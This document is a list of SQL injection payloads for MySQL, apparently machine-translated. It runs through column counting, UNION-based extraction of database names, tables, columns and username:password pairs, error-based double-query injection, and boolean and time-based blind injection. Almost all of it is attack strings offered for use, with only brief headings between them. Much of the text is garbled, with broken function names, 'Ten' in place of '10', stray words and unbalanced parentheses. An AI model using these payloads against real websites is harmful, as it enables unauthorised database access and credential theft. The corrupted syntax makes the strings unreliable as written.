# Note: these strings only have an effect where user input is concatenated into the SQL text; queries that bind input as parameters treat them as plain data.
# Basic injection
' --+'--% -' #'% at'and 1=1--+' and 1=2--+'and 1=2 Union SELECT * FROM admin--+' and 1=2Union SELECT * FROM User--+'and 1=2 Union SELECT * from users--+
# Determine the number of fields
'ORDER BY1--+'ORDER by 2--+'ORDER BY3--+'ORDER by 4--+'ORDER BY5--+'ORDER BY 6--+'ORDER BY7--+'ORDER by 8--+'ORDER BY9--+'ORDER by--+
# Database information (the examples here are limited to a field count of 1)
' and 1=2UNION ALL Select version ()--+'and 1=2 UNION ALL Select User ()--+' and 1=2UNION ALL Select Database ()--+
# Determine the operating system
'and 1=2 UNION ALL SELECT @ @global. Version_compile_os from Mysql.user--+
# Database privileges: a normal response indicates root privileges
' andOrd (User (),1,1))= the--+
# Extract data
'and 1=2 Union Select User (), version (), database (), @ @datadir, Schema_name,current_user (), 7,8,9,10 from Information_ Schema. Schemata Limit 0,1--+' and 1=2Union Select1,2,3, TABLE_NAME,5,6,7,8,9,TenFrom INFORMATION_SCHEMA. TABLES where table_schema=database () limit0,1--+'and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where Table_name=table_name limit 0,1--+' and 1=2Union Select1,2,3, Group_concat (column_name),5,6,7,8,9,TenFrom INFORMATION_SCHEMA. 
COLUMNS where Table_name=table_name limit0,1--+'and 1=2 Union select 1,2,3,GROUP_CONCAT (username), 5,6,7,8,9,10 from table_name--+' and 1=2Union Select1,2,3, Group_concat (Username,0x3a,password),5,6,7,8,9,TenFrom table_name--+
# Without comment characters
' and'1'Union Select 1 and'1 'Union Select and'1 'and 1=2 Union select 1,version (), 3 and'1 'or'1
# Input wrapped in parentheses
') --+') --% -') #') % at
# Input wrapped in double quotes
" --+"--%20" #"%23
# Input wrapped in double quotes and parentheses
") --+")--%20") #")%23
# Double-query injection
# Count the number of fields
select COUNT (*) from table_name;
# Random number generation
select rand (); select rand ()*4;
# Floating-point numbers
select Floor (Rand ()), select Floor (rand ()*4);
# Alias
select Floor (rand ()*4as query;
# Grouping
select Username,password from the user group by username;
# Query within a query
select (select Database ());
# String concatenation: concat (str1 , str2)
Select Concat ((select Database ())), select Concat (0x3a,0x3a, (select Database ()), 0x3a,0x3a), select Concat (0x3a, 0X3A, (select Database ()), 0x3a,0x3a) as Query;select concat (0x3a,0x3a, (select Database ()), 0x3a,floor (rand ()*2) as Query;select concat (0x3a,0x3a, (select Database ()), 0x3a,floor (rand ()*2) as query from User;select count (*), Concat (0x3a,0x3a, (select Database ()), 0x3a,floor (rand () *2) as query from the user group by Query;select count (*), Concat (0x3a,0x3a, (select User ()), 0x3a,floor (rand () *2) as query from the user group by Query;select count (*), Concat (0X3A,0X3A, (select table_name from INFORMATION_SCHEMA. TABLES where table_schema=database () limit0,1), 0x3a,floor (rand () *2) as query from the user group by query;'and (select 1 from (SELECT COUNT (*), concat (0X3A,0X3A, (select table_name from INFORMATION_SCHEMA. TABLES where table_schema=database () limit 0,1), 0x3a,floor (rand ()) as query from the user group by query) as test)--+' and 1=2Union (SELECT * FROM (SELECT COUNT (*), concat (0X3A,0X3A, (select table_name from INFORMATION_SCHEMA. 
TABLES where table_schema=database () limit0,1), 0x3a,floor (rand () *2) as query from the user group by query) as test--+
# Blind injection
# Boolean-based blind
Select database (),
# Determine length
select Length (Database ()),
# Substring: substr (str,num1,num2) - num1: starting position; num2: number of characters
Select SUBSTR (Database (),1,1);
# ASCII code
select ASCII (substr (),1,1));'and 1<2--+' and(ASCII (substr (select Database ()),1,1)))=98--+
# Time-based blind injection
# Sleep
Select Sleep (1);
# Conditional test
select if ((select Database ())="Bloodzero ", Sleep (Ten), null);'and Sleep (Ten)--+' andif ((select Database ()) ="Bloodzero ", Sleep (Ten), null)--+
Common SQL injection statements